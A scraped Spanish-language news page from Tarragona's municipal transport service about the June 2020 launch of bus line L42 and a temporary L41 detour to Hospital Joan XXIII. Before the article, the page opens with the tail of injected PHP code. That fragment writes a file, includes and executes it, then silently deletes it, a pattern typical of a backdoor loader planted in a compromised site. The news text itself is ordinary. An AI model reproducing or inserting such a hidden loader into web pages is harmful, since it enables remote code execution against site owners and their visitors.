");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Entra en funcionamiento la línea L42 de autobús, que une el centro con el Complejo Educativo de Tarragona
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Entra en funcionamiento la línea L42 de autobús, que une el centro con el Complejo Educativo de Tarragona (01/06/2020)

Hoy, 1 de junio, la Empresa Municipal de Transportes (EMT) pone en funcionamiento la línea L42 que une el centro la ciudad (Via Roma) con el Complejo Educativo.

La medida surge de la voluntad de "dar respuesta a las necesidades de la ciudadanía, ya que el lunes se reanuda parte de la actividad lectiva de los centros educativos", explica el presidente de la EMT, Jordi Fortuny.

Los autobuses de la L42 circularán en horario no lectivo.

Modificación excepcional del recorrido de la L41

Excepcionalmente, y mientras dure la situación de alarma por el riesgo de infección por el coronavirus, la línea L41 Zona Educacional-Estación varía parcialmente su recorrido (de ida y vuelta) para hacer parada en el Hospital Joan XXIII.

"La situación actual requiere garantizar el enlace de todos los barrios con los centros de atención sanitaria", argumenta Fortuny. De hecho, esta medida permite a los vecinos y vecinas de la parte baja la conexión con el Hospital Joan XXIII mediante el transporte público municipal.

Fuente: Ayuntamiento de Tarragona

Entra en funcionamiento la línea L42 de autobús, que une el centro con el Complejo Educativo de Tarragona

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona